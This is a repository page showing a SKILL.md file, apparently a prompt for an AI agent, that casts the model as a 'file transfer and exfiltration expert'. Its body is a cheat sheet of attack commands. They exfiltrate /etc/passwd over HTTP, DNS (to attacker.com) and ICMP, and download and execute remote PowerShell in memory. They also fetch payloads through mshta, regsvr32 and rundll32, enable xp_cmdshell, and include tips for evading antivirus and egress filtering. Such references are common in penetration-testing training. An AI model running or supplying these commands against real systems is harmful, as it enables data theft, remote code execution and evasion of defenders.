zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
33a29e697aa02f2496e9797c09d2dfab3440254e
gh-trilwu-secskills-secskills/skills/file-transfer-techniques/SKILL.md
Zhongwei Li 33a29e697a Initial commit
2025-11-30 09:03:09 +08:00

528 lines
12 KiB
Markdown
Raw Blame History

---
name: transferring-files
description: Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
---
# File Transfer Techniques Skill
You are a file transfer and exfiltration expert. Use this skill when the user requests help with:
- Transferring files between systems
- Data exfiltration techniques
- Living-off-the-land file transfer methods
- Cross-platform file operations
- Encoding and obfuscation
- Bypassing egress filtering
- Establishing file servers
## Core Methodologies
### 1. Linux File Download
**wget:**
```bash
# Basic download
wget http://10.10.10.10/file.txt
# Save with different name
wget http://10.10.10.10/file.txt -O output.txt
# Recursive download
wget -r http://10.10.10.10/directory/
# Download in background
wget -b http://10.10.10.10/largefile.zip
```
**curl:**
```bash
# Basic download
curl http://10.10.10.10/file.txt -o file.txt
curl -O http://10.10.10.10/file.txt # Keep original name
# Follow redirects
curl -L http://10.10.10.10/file.txt -o file.txt
# Download with auth
curl -u user:password http://10.10.10.10/file.txt -o file.txt
# Download multiple files
curl -O http://10.10.10.10/file[1-10].txt
```
**Netcat:**
```bash
# Receiver
nc -lvnp 4444 > file.txt
# Sender
nc 10.10.10.10 4444 < file.txt
# With progress (use pv)
nc -lvnp 4444 | pv > file.txt
pv file.txt | nc 10.10.10.10 4444
```
**Base64 Encoding (for copy-paste):**
```bash
# Encode on attacker machine
base64 file.txt > file.b64
cat file.b64 # Copy this
# Decode on target
echo "BASE64_STRING_HERE" | base64 -d > file.txt
# Or in one command
echo "BASE64STRING" | base64 -d > file.txt
```
**Python HTTP Server (for hosting files):**
```bash
# Python 3
python3 -m http.server 8000
# Python 2
python -m SimpleHTTPServer 8000
# Ruby
ruby -run -e httpd . -p 8000
# PHP
php -S 0.0.0.0:8000
```
### 2. Windows File Download
**PowerShell:**
```powershell
# Invoke-WebRequest (PS 3.0+)
Invoke-WebRequest -Uri "http://10.10.10.10/file.exe" -OutFile "C:\Temp\file.exe"
iwr -Uri "http://10.10.10.10/file.exe" -OutFile "C:\Temp\file.exe"
# DownloadFile
(New-Object Net.WebClient).DownloadFile("http://10.10.10.10/file.exe", "C:\Temp\file.exe")
# DownloadString (download and execute)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
# Download and execute in memory
$data = (New-Object Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')
$assem = [System.Reflection.Assembly]::Load($data)
```
**certutil:**
```cmd
# Download file
certutil.exe -urlcache -split -f "http://10.10.10.10/file.exe" file.exe
# Alternative syntax
certutil -urlcache -f "http://10.10.10.10/file.exe" file.exe
# Clean cache
certutil.exe -urlcache * delete
```
**bitsadmin:**
```cmd
# Download file
bitsadmin /transfer job /download /priority high http://10.10.10.10/file.exe C:\Temp\file.exe
# Verify and complete
bitsadmin /complete job
```
**cmd.exe (VBS script):**
```cmd
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.10.10.10/file.exe file.exe
```
### 3. Linux File Upload/Exfiltration
**HTTP POST:**
```bash
# curl
curl -X POST -F "file=@/etc/passwd" http://10.10.10.10:8000/upload
# With auth
curl -X POST -F "file=@file.txt" http://10.10.10.10:8000/upload -u user:pass
# wget
wget --post-file=/etc/passwd http://10.10.10.10:8000/upload
```
**SCP (if SSH available):**
```bash
# Upload
scp file.txt user@10.10.10.10:/tmp/
# Download
scp user@10.10.10.10:/tmp/file.txt ./
# Recursive
scp -r directory/ user@10.10.10.10:/tmp/
# With key
scp -i id_rsa file.txt user@10.10.10.10:/tmp/
```
**Netcat:**
```bash
# Receiver (attacker)
nc -lvnp 4444 > received_file.txt
# Sender (target)
nc 10.10.10.10 4444 < file.txt
```
**Socat:**
```bash
# Receiver
socat TCP4-LISTEN:4444,fork file:received.txt
# Sender
socat TCP4:10.10.10.10:4444 file:file.txt
```
**DNS Exfiltration:**
```bash
# Encode data and send via DNS queries
for data in $(cat /etc/passwd | base64 | tr -d '=' | fold -w 32); do
dig $data.attacker.com @dns-server
done
# Receive on DNS server logs
```
**ICMP Exfiltration:**
```bash
# Send data in ICMP packets
cat file.txt | xxd -p -c 16 | while read line; do
ping -c 1 -p $line 10.10.10.10
done
# Receive with tcpdump
tcpdump -i eth0 icmp -X
```
### 4. Windows File Upload
**PowerShell:**
```powershell
# Upload via HTTP POST
$file = Get-Content "C:\Temp\file.txt" -Raw
Invoke-RestMethod -Uri "http://10.10.10.10:8000/upload" -Method Post -Body $file
# Upload file object
$fileBytes = [System.IO.File]::ReadAllBytes("C:\Temp\file.exe")
Invoke-RestMethod -Uri "http://10.10.10.10:8000/upload" -Method Post -Body $fileBytes
```
**SMB:**
```cmd
# Copy to SMB share
copy C:\Temp\file.txt \\10.10.10.10\share\
# Map drive first
net use Z: \\10.10.10.10\share
copy C:\Temp\file.txt Z:\
```
**FTP:**
```cmd
# Create FTP script
echo open 10.10.10.10 > ftp.txt
echo user username password >> ftp.txt
echo binary >> ftp.txt
echo put file.exe >> ftp.txt
echo bye >> ftp.txt
# Execute
ftp -s:ftp.txt
```
### 5. SMB File Transfer
**Linux to Windows:**
```bash
# Mount SMB share on Linux
smbclient //10.10.10.10/share -U username
# In smbclient:
put local_file.txt
get remote_file.txt
# Mount and copy
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass
cp file.txt /mnt/smb/
```
**Windows to Linux:**
```bash
# Start Samba server on Linux
sudo smbserver.py share /tmp/share -smb2support
# From Windows
copy C:\file.txt \\10.10.10.10\share\
```
**Impacket smbserver:**
```bash
# On attacker (Linux)
sudo impacket-smbserver share /tmp/share -smb2support
sudo impacket-smbserver share /tmp/share -smb2support -username user -password pass
# On target (Windows)
# No auth
copy file.txt \\10.10.10.10\share\
\\10.10.10.10\share\file.exe
# With auth
net use \\10.10.10.10\share /user:user pass
copy file.txt \\10.10.10.10\share\
```
### 6. FTP File Transfer
**Linux FTP Server:**
```bash
# Python pyftpdlib
sudo python3 -m pyftpdlib -p 21 -w
# vsftpd (if installed)
sudo service vsftpd start
```
**Windows FTP Client:**
```cmd
# Interactive
ftp 10.10.10.10
# Scripted
echo open 10.10.10.10 21 > ftp.txt
echo USER username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo GET file.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
```
### 7. Living Off The Land (LOLBAS/GTFOBins)
**Windows LOLBAS:**
```cmd
# certutil (already shown)
certutil -urlcache -f http://10.10.10.10/file.exe file.exe
# mshta
mshta http://10.10.10.10/payload.hta
# regsvr32
regsvr32 /s /n /u /i:http://10.10.10.10/file.sct scrobj.dll
# rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/payload.ps1')")
```
**Linux GTFOBins:**
```bash
# See GTFOBins for specific binaries
# https://gtfobins.github.io/
```
### 8. Database Exfiltration
**MySQL:**
```sql
-- Write to file (requires FILE privilege)
SELECT * FROM users INTO OUTFILE '/tmp/users.txt';
SELECT LOAD_FILE('/etc/passwd') INTO OUTFILE '/tmp/passwd.txt';
-- Read from file
LOAD DATA INFILE '/tmp/data.txt' INTO TABLE users;
```
**MSSQL:**
```sql
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Use certutil to download
EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.10.10/file.exe C:\Temp\file.exe';
```
**PostgreSQL:**
```sql
-- Write to file
COPY (SELECT * FROM users) TO '/tmp/users.txt';
-- Read from file
COPY users FROM '/tmp/data.txt';
-- Command execution to download
COPY (SELECT '') TO PROGRAM 'wget http://10.10.10.10/file.txt -O /tmp/file.txt';
```
### 9. Encoding/Obfuscation
**Base64:**
```bash
# Encode
base64 file.txt > file.b64
cat file.txt | base64
# Decode
base64 -d file.b64 > file.txt
cat file.b64 | base64 -d > file.txt
```
**Hex Encoding:**
```bash
# Encode
xxd -p file.txt > file.hex
hexdump -ve '1/1 "%.2x"' file.txt > file.hex
# Decode
xxd -r -p file.hex > file.txt
```
**Gzip Compression:**
```bash
# Compress
gzip file.txt # Creates file.txt.gz
# Decompress
gunzip file.txt.gz
```
**Tar Archive:**
```bash
# Create
tar -czf archive.tar.gz directory/
# Extract
tar -xzf archive.tar.gz
```
### 10. Persistence and Staging
**Download and Execute:**
```bash
# Linux
wget http://10.10.10.10/script.sh -O /tmp/script.sh && chmod +x /tmp/script.sh && /tmp/script.sh
# One-liner
curl http://10.10.10.10/script.sh | bash
# PowerShell
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')"
```
**In-Memory Execution:**
```powershell
# PowerShell - never touches disk
$code = (New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
IEX $code
# Reflective DLL loading
$bytes = (New-Object Net.WebClient).DownloadData('http://10.10.10.10/payload.dll')
[System.Reflection.Assembly]::Load($bytes)
```
## Quick Reference Commands
**Start HTTP Server (Attacker):**
```bash
python3 -m http.server 8000
sudo python3 -m http.server 80
```
**Start SMB Server (Attacker):**
```bash
sudo impacket-smbserver share /tmp/share -smb2support
```
**Download on Target (Linux):**
```bash
wget http://10.10.10.10:8000/file
curl http://10.10.10.10:8000/file -o file
```
**Download on Target (Windows):**
```cmd
certutil -urlcache -f http://10.10.10.10:8000/file.exe file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10:8000/file.exe','file.exe')"
```
**Upload from Target:**
```bash
# Linux
curl -X POST -F "file=@file.txt" http://10.10.10.10:8000/
nc 10.10.10.10 4444 < file.txt
# Windows
copy file.txt \\10.10.10.10\share\
```
## Troubleshooting
**Firewall Blocking:**
- Try alternative ports (80, 443, 53)
- Use DNS/ICMP exfiltration
- Encode data and use allowed protocols
**AV Detection:**
- Encode/obfuscate payloads
- Use in-memory execution
- Split file into chunks
- Use legitimate tools (LOLBAS)
**No Internet Access:**
- Use local file shares (SMB, NFS)
- Use removable media if physical access
- Use database OUT FILE if database access
- Use local services (FTP, HTTP on internal network)
## Reference Links
- LOLBAS Project: https://lolbas-project.github.io/
- GTFOBins: https://gtfobins.github.io/
- HackTricks File Transfer: https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/File%20Transfer.md
## When to Use This Skill
Activate this skill when the user asks to:
- Transfer files between systems
- Download files to compromised systems
- Exfiltrate data from targets
- Set up file servers for attacks
- Bypass egress filtering
- Use living-off-the-land techniques
- Encode or obfuscate file transfers
- Help with data staging
Always ensure proper authorization before transferring files to/from any system.
Reference in New Issue View Git Blame Copy Permalink